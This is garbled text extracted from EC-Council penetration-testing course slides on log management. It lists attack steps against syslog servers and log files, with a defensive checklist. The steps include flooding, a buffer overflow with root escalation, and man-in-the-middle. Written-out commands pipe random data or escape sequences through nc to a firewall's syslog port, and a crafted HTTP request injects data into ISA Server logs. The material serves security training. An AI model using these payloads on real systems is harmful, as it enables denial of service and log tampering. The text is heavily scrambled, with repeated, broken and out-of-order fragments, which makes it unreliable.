/ ECSA / LPT EC Council Module XXXV EC - Council Module XXXV Log Management Penetration Testing Penetration Testing Penetration Testing Roadmap Start Here Information Vulnerability External Gathering Analysis Penetration Testing ill Router and Internal F i rewa ll Penetration Testing Router and Switches Penetration Testing Internal Network Penetration Testing IDS Penetration Testing Wireless Network Penetration Testing Denial of Service Penetration Testing Password Cracking Stolen Laptop, PDAs and Cell Phones Social Engineering Application Cont’d EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Penetration Testing Penetration Testin g Penetration Testing Penetration Testing Penetration Testing Roadmap (cont ’ d) (cont d) Cont’d Physical Si Database Pii VoIP PiTi S ecur i t y Penetration Testing P enetrat i on test i ng P enetrat i on T est i n g Vi d Vi rus an d Trojan Detection War Dialing VPN Penetration Testing Log Management Penetration Testing File Integrity Checking Blue Tooth and Hand held Device Penetration Testing Telecommunication And Broadband Communication Email Security Penetration Testin g Security Patches Data Leakage Penetration Testing End Here EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Communication Penetration Testing g Penetration Testing Penetration Testing Introduction Log files maintain record of all the events occurring in an organization’s systems and networks systems and networks . Log management systems are used to manage log files across a network. Since threats against the systems and networks has increased, security of the log management systems also need to be increased. Logs are classified into: • Security software logs: These logs record all instances of detected vulnerabilities to software. • Operating system logs : These logs record all instances of detected EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited • Operating system logs : These logs record all instances of detected vulnerabilities to the operating system. Need for Log Management To record each and every action performed on the system To ensure the recorded instances are stored for appropriate duration To perform routine log review and analysis that helps to identify the security threats, policy violation, operational problems, etc. violation, operational problems, etc. To perform auditing and forensic analysis in investigation of malicious activities O p eratin g s y stem lo g entr y exam p le: pg y g y p Event Type: Success Audit Event Source: Security Event Category: (1) Event ID: 517 Date: 3/3/2008 Time: 4:30:40 PM User: NT AUTHORITY\SYSTEM Computer: KENT Description: The audit log was cleared Primary User Name : SYSTEM Primary Domain : NT AUTHORITY EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Primary User Name : SYSTEM Primary Domain : NT AUTHORITY Primary Logon ID: (0x0,0x3F7) Client User Name: userk Client Domain: KENT Client Logon ID: 0x0,0x28BFD) Challenges in Log Management Potential problems with the initial generation of logs Inconsistent log formats fd l d l bl f dl Con f i d entia l ity, integrity, an d avai l a b i l ity o f generate d l ogs Inaccuracy in internal clock EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Steps for Log Management Penetration Testing Penetration Testing 1 • Scan for log files 2 • Try to flood Syslog servers with bogus log data •Tr y malicious S y slo g messa g e attack ( buffer overflow ) 3 yygg( ) 4 • Perform man-in-the-middle attack 5 • Check whether the logs are encrypted 6 • Check whether arbitrary data can be injected remotely into Microsoft ISA server log file 7 • Perform DoS attack against check point FW-1 Syslog daemon Sd Sl ii Sl d f hk i FW NG FP EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited 8 • S en d S ys l og messages conta i n i ng escape sequences to S ys l og d aemon o f c h ec k po i nt FW -1 NG FP 3 Step 1: Scan for Log Files Use different scanning tools to scan the log files in the system. Some of the log file scanning tools are: • Sawmill. • Bcnums g . g EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Step 2: Try to Flood Syslog Servers with Bogus Log Data Servers with Bogus Log Data Most syslog implementations use the connectionless, unreliable UDP to transfer logs between hosts. UDP p rovides no assurance that lo g entries will be received pg successfully or in the correct sequence. Most syslog implementations do not perform any access control, so Most syslog implementations do not perform any access control, so any host can send messages to a syslog server. Check for denial of service that may cause flooding. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Step 3: Try Malicious Syslog Message Attack (Buffer Overflow) Attack (Buffer Overflow) Construct a large syslog message with target specific codes at the end of h t h e message. If syslog messages are allowed from untrusted hosts, try to send syslog il b ff fl di i i f d messages unt il a b u ff er over fl ow con di t i on i s f oun d . Try to elevate a local user process to root privileges after buffer overflow. Try to elevate a local user process to root privileges after buffer overflow. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited [...]... software for logging mechanisms Select secure log file locations Encrypt log files Store them on the other host in order to stop tampering of log files Establish standard policies and procedures for log management Create and maintain secure l management i f C d i i log infrastructure EC-Council Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Checklist for Secure Log Management. .. syslog daemon by enabling the firewall object y g y g j Check for listening syslog daemon Send a valid syslog message from a remote host Send random payload via syslog message from a remote host • [evilhost]# cat /dev/urandom | nc -u firewall 514 EC-Council Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Step 8: Send Syslog Messages Containing Escape Sequences to Syslog... receiving of syslog from remote by FW-1 Send some special escape sequences via syslog [evilhost]# [ ilh t]# echo -e "19 00 01 04 h "19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514 EC-Council Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Checklist For Secure Log Management Maintain back up for log files... Management (cont’d) (cont d) Train the personnel holding log management responsibilities p g g g p Give limited access to log files Use the secure mechanism to transfer log files from one system to another Check the internal clock of the system EC-Council Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Summary Log files are the files that maintain record of all the... Man-in-theMiddle Attack Man-in-the-middle attacks can be used to modify or destroy syslog y y y g messages in transit Check if the syslog client checks for the server's identity as presented in server s the server's certificate message before sending log files Check client s local /.ssh/known_hosts file if ssh tunnel is used for log client’s / ssh/known hosts transmissions EC-Council Copyright © by EC-Council... EC-Council All Rights Reserved Reproduction is Strictly Prohibited Step 5: Check Whether the Logs are Encrypted Most of the syslog cannot use encryption to protect the integrity or confidentiality of logs during transaction Sniff the network with different sniffing tools such as Ethereal and SniffIt SniffIt Try to monitor syslog messages containing sensitive information regarding system configurations and security... maintain record of all the events occurring in an organization’s systems and networks Logs are used to perform auditing and forensic analysis in investigation of malicious activities Most syslog implementations use the connectionless unreliable y g p UDP to transfer logs between hosts Use updated version of software for logging mechanisms mechanisms Check the internal clock of th system Ch k th i t l l... Microsoft ISA Server Log File ( Only for Microsoft ISA Server) Send a specially-crafted HTTP request to modify the destination host parameter i the l fil h in h log file GET / HTTP/1.0 Host: %01%02%03%04 t Transfer-Encoding: whatever EC-Council Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Step 7: Perform DoS Attack Against Check Point FW-1 Syslog Daemon (Only for . / ECSA / LPT EC Council Module XXXV EC - Council Module XXXV Log Management Penetration Testing Penetration Testing Penetration Testing Roadmap Start Here Information Vulnerability External Gathering Analysis Penetration. Penetration Testing ill Router and Internal F i rewa ll Penetration Testing Router and Switches Penetration Testing Internal Network Penetration Testing IDS Penetration Testing Wireless Network Penetration. Penetration Testing Penetration Testin g Penetration Testing Penetration Testing Penetration Testing Roadmap (cont ’ d) (cont d) Cont’d Physical Si Database Pii VoIP PiTi S ecur i t y Penetration